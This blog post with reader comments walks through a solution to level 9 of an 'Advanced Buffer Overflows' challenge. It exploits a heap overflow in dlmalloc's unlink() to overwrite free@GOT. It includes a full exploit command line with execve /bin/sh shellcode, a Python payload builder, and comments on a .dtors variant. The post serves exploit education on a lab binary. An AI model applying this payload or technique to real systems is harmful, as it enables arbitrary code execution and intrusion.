Advanced Buffer Overflows: Defeating #9

After the fun-and-go! session in the previous post it didn't take too long to create an exploit for this kind of situation. Today I present the solution for the 9th level of the Advanced Buffer Overflows challenge, which deals with free() and a dlmalloc implementation. First of all, let's take a look at the C source:
int main(int argv,char **argc) {
char *pbuf1=(char*)malloc(256);
char *pbuf2=(char*)malloc(256);


In my particular case I replaced gets() with strcpy(), using the command-line arguments as the input vector to ease data input and exploitation, which doesn't alter the bug in any way. This level is a textbook example of a heap buffer overflow in which we fool the implementation and the unlink() macro into overwriting arbitrary bytes in memory.

As explained in our last post, we need to create a fake chunk header in one of our buffers and trick free() into calling unlink() on it. For this purpose we will overwrite the chunk header of buf2 so that the implementation's calculations lead it to our fake chunk header. Specifically, we overwrite the prev_size field so that when _int_free() calculates the address of the previous chunk, it lands on our fake chunk header. Instead of a step-by-step debugging session, I will explain the key instructions where the data flow gets manipulated. Remember you can grab the disassembly here.

First let's look at the call itself so that we can identify the data we're analyzing. Note in this call that the sub-sequence "\xf8\xff\xff\xff"+"\xf0\xff\xff\xff" is where our overflow begins; these 8 bytes will eventually fill the chunk header for buf2:

[infi@localhost insecure]$ ./abo9 `python -c 'print "\xeb\x0e"+"A"*14+"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"+"A"*188+"\xff\xff\xff\xff"+"A"*8+"\xf8\xff\xff\xff"+"\xf0\xff\xff\xff"+"\xff\xff\xff\xff"*2+"\x9c\x95\x04\x08"+"\x08\x96\x04\x08"'`
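To make the layout of that argument easier to follow, here is a minimal Python 3 sketch (the one-liner above is Python 2) that rebuilds the same byte string piece by piece and prints the address where each piece lands. It does not run anything against the target. The base address of buf1 (0x08049608) is the one quoted later in this post and is assumed to be fixed; the names BUF1, PIECES and layout() and the labels attached to each piece are only illustrative.

```python
import struct

BUF1 = 0x08049608  # address of buf1 as quoted in this post (assumed fixed)

# The 40-byte execve("/bin/sh") shellcode from the command line above
SHELLCODE = bytes.fromhex(
    "eb1a5e31c08846078d1e895e0889460cb00b89f38d4e088d560ccd80"
    "e8e1ffffff2f62696e2f7368"
)

# (label, bytes) pairs in the same order as the command-line argument
PIECES = [
    ("short jmp over the clobbered area", b"\xeb\x0e"),
    ("padding skipped by the jmp", b"A" * 14),
    ("shellcode", SHELLCODE),
    ("filler", b"A" * 188),
    ("0xffffffff near the end of buf1", b"\xff" * 4),
    ("filler up to the end of buf1", b"A" * 8),
    ("buf2 prev_size = -8", struct.pack("<i", -8)),
    ("buf2 size = -16", struct.pack("<i", -16)),
    ("fake chunk prev_size and size", b"\xff" * 8),
    ("fake chunk fd", struct.pack("<I", 0x0804959C)),
    ("fake chunk bk", struct.pack("<I", 0x08049608)),
]


def layout(pieces, base=BUF1):
    """Return (address, length, label) for every piece, starting at base."""
    rows = []
    addr = base
    for label, data in pieces:
        rows.append((addr, len(data), label))
        addr += len(data)
    return rows


payload = b"".join(data for _, data in PIECES)

for addr, size, label in layout(PIECES):
    print(f"0x{addr:08x}  {size:3d} bytes  {label}")
```

The first six pieces add up to exactly 256 bytes, so everything from "buf2 prev_size" onwards is what spills over into buf2's chunk.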

At 0x4207446b the address of "\xf8\xff\xff\xff" (buf2's prev_size field) gets loaded into ecx, and right after that "\xf0\xff\xff\xff" (buf2's size field) is copied into eax. At address 0x42074477 eax is copied into esi. One of the critical points comes at 0x420744ad, where esi=0xfffffff0 and ecx=0x08049708 are added and the result is stored in eax. With 32-bit wraparound that sum is 0x08049708-0x10=0x080496f8, an address near the end of buf1 that the implementation takes for the chunk following buf2; the "\xff\xff\xff\xff" we placed just before the final 8 "A"s of buf1 lands at 0x080496fc, in that chunk's size field.

Anyway, all of that is there just to pass some checks; the real magic begins now. At 0x420744c8 the value at edi-8 (the start of buf2's chunk header) is loaded into eax, so eax now holds the prev_size field of buf2's chunk header. In the next instruction, remembering that ecx holds the address of buf2's prev_size, ecx = ecx - eax is executed. We manipulated the prev_size of buf2 to read 0xfffffff8 (-8), so this effectively moves ecx 8 bytes forward, to an address inside buf2 that we control thanks to the overflow: ecx now points to 0x08049710, the chunk header of our fake chunk. Since the first 8 bytes after the header of this "unused" chunk are its fd and bk pointers, our job is kindly completed by unlink(), which, using offsets 0x8 and 0xc, will write 0x08049608 (the address of our shellcode, stored in buf1 itself) to 0x0804959c+12=0x080495a8 (the address of free@GOT).
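The arithmetic in the paragraph above can be replayed with a toy model. The following Python 3 sketch is not dlmalloc code: it keeps "memory" in a dictionary, uses the addresses quoted in this post, and mimics the two writes of the classic unlink() macro (FD->bk = BK and BK->fd = FD) with fd at offset 8 and bk at offset 12. The helper names prev_chunk() and unlink() are made up for illustration.

```python
MASK = 0xFFFFFFFF  # emulate 32-bit register arithmetic


def prev_chunk(chunk_addr, prev_size):
    """Address derived for the previous chunk: chunk - prev_size (mod 2**32)."""
    return (chunk_addr - prev_size) & MASK


def unlink(mem, p):
    """Toy model of the classic unlink(); returns the (address, value) writes."""
    fd = mem[p + 8]     # P->fd
    bk = mem[p + 12]    # P->bk
    mem[fd + 12] = bk   # FD->bk = BK
    mem[bk + 8] = fd    # BK->fd = FD
    return [(fd + 12, bk), (bk + 8, fd)]


# Values quoted in the walkthrough
BUF2_CHUNK = 0x08049708          # address of buf2's prev_size field
mem = {
    0x08049718: 0x0804959C,      # fake fd
    0x0804971C: 0x08049608,      # fake bk (our shellcode in buf1)
}

fake = prev_chunk(BUF2_CHUNK, 0xFFFFFFF8)   # prev_size = -8
writes = unlink(mem, fake)

print(f"fake chunk at 0x{fake:08x}")
for addr, value in writes:
    print(f"write 0x{value:08x} at 0x{addr:08x}")
```

The first write is the one we want (the shellcode address into free@GOT); the second one is the side effect that lands at shellcode+8.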

That's basically it, but a couple of notes are in order. First of all, the 4 bytes at shellcode+8 will get clobbered with 0x0804959c; that's how unlink() works. To make the shellcode work properly, we place an unconditional jump at the beginning to jump over the clobbered area, which is why we include "\xeb\x0e"+"A"*14 at the beginning of the shellcode (eb is the opcode for a short "jmp" and 0x0e=14 is the offset). Also, we need to make sure it is the GOT entry for free() that we overwrite, because right after we trick free() into doing this, it gets called once again on buf1. With the headers manipulated this way, a genuine second free() would crash the program with a segmentation fault (SIGSEGV), whereas the overwritten GOT entry sends that call to our shellcode instead.
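A quick way to check the jump arithmetic: a short jmp (opcode 0xeb) takes a signed 8-bit displacement measured from the end of the 2-byte instruction. The Python 3 sketch below, with an illustrative helper name, computes the landing offset and confirms that the four bytes unlink() writes at shellcode+8 fall inside the skipped padding.

```python
def short_jmp_target(code, offset=0):
    """Offset reached by the short jmp (0xeb rel8) located at `offset`."""
    if code[offset] != 0xEB:
        raise ValueError("not a short jmp")
    rel8 = code[offset + 1]
    if rel8 >= 0x80:           # the displacement is a signed byte
        rel8 -= 0x100
    return offset + 2 + rel8   # relative to the end of the instruction


prefix = b"\xeb\x0e" + b"A" * 14
target = short_jmp_target(prefix)
clobbered = range(8, 12)       # the 4 bytes written by BK->fd = FD

print("jmp lands at offset", target)
print("clobbered bytes are skipped:", all(2 <= i < target for i in clobbered))
```

The landing offset equals the length of the prefix, so execution resumes exactly at the first byte of the real shellcode.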

I hope this little walkthrough enlightens somebody as it did me. For any suggestion, question or whatever, don't hesitate to drop a comment or write an email. See you next time and keep adding NOPs!


TuXeD said...

Just a quick note on it.

Besides overwriting the GOT entry for free(), it is also possible to exploit such a bug by overwriting the .dtors section and introducing the address of your shellcode in there.

For instance, this paper (which I just found using google and never read) talks about it: http://www.infosecwriters.com/texts.php?op=display&id=19

Keep on adding NOPs, it's a nice blog to read and I'm looking forward to reading more info on advanced topics here :)

infi said...

First of all thanks for the feedback and note that I'm very glad for it.

I've taken a look at the paper and, although I'll try to do some research on it, my first guess is as follows: overwriting the .dtors section looks feasible, but for that to be possible we need to alter the buffer and move the shellcode towards the middle-to-late part of the buffer (it's at the beginning in this example).

Since free() is called on buf1, its first 8 bytes need to be left free, because pointers will be moved around there. Those first 8 bytes (which in our exploit hold the "jmp") will be clobbered by the way free() normally works. Hence, when .dtors redirects execution there, no executable code is waiting, only garbage from malloc management.

That's the idea that first pops into my mind, but as I said I'll try to get a more hands-on answer. Thanks again for taking the time to elaborate on that, hope to see you around again! :-)

TuXeD said...

mmm maybe I'm not getting exactly what you say, but as far as I can see overwriting .dtors is exactly the same as overwriting the GOT.

I.e., you just place the .dtors address minus 12 in one of the pointers, your shellcode's address minus 8 in the other one, and you start your shellcode with something like [jump over garbage][garbage][the actual shellcode] so that only the garbage is clobbered.

I'm just taking it from the top of my mind, but I'm pretty sure I've used this technique when learning about heap overflows a while ago.

infi said...

What I meant to say is that in the paper, the author places the shellcode towards the mid-to-late area of buf1, and thus the early area (where fd and bk are stored once it's freed) is free for malloc manipulation, which in my particular exploit wasn't the case. I thought malloc would smash the beginning of the shellcode when executing free(buf1), so that when .dtors redirected execution towards buf1, the area would be trashed.

I just ran some tests to prove my concept, but they didn't work out. Perhaps I'm missing something here. I manage to overwrite the .dtors section, but when free(buf1) happens, _int_free() crashes with a SIGSEGV when performing unlink() because edi holds 0xffffffff (-1).

I guess this needs a deeper analysis, which I'll leave for some time in the future. Yet again, thanks for showing interest in the matter and contributing :-)